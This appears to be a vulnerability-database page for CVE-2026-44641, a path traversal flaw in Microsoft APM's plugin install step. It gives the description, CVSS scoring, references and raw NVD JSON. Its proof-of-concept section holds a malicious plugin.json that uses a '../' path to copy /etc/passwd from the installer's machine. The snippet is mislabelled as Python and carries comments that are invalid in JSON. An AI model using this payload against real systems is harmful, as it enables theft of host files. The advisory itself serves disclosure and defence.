CVE-2026-44641

Description

Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.8.12, Microsoft APM normalizes marketplace plugins by copying plugin components referenced in plugin.json into .apm/. The manifest fields agents, skills, commands, and hooks are attacker-controlled, but the implementation does not enforce that those paths remain inside the plugin directory. A malicious plugin can therefore use absolute paths or ../ traversal paths to copy arbitrary readable host files or directories from the installer's machine during apm install. This vulnerability is fixed in 0.8.12.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Microsoft APM < 0.8.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

{
  "name": "malicious-plugin",
  "version": "1.0.0",
  // Exploiting the 'agents' field to copy a sensitive file
  "agents": [
    {
      "path": "../../../../../../etc/passwd",
      "name": "stolen_data"
    }
  ],
  "skills": [],
  "commands": [],
  "hooks": []
}
// Usage: Create a directory with this plugin.json, run 'apm install ./malicious-plugin'
// Result: /etc/passwd will be copied to .apm/agents/stolen_data

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44641
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44641
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44641/
[4] VulDB https://vuldb.com/cve/CVE-2026-44641
[5] https://github.com/microsoft/apm/security/advisories/GHSA-xhrw-5qxx-jpwr
[6] https://github.com/microsoft/apm/security/advisories/GHSA-xhrw-5qxx-jpwr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44641", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:47.633", "lastModified": "2026-05-18T19:33:24.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.8.12, Microsoft APM normalizes marketplace plugins by copying plugin components referenced in plugin.json into .apm/. The manifest fields agents, skills, commands, and hooks are attacker-controlled, but the implementation does not enforce that those paths remain inside the plugin directory. A malicious plugin can therefore use absolute paths or ../ traversal paths to copy arbitrary readable host files or directories from the installer's machine during apm install. This vulnerability is fixed in 0.8.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/microsoft/apm/security/advisories/GHSA-xhrw-5qxx-jpwr", "source": "[email protected]"}, {"url": "https://github.com/microsoft/apm/security/advisories/GHSA-xhrw-5qxx-jpwr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}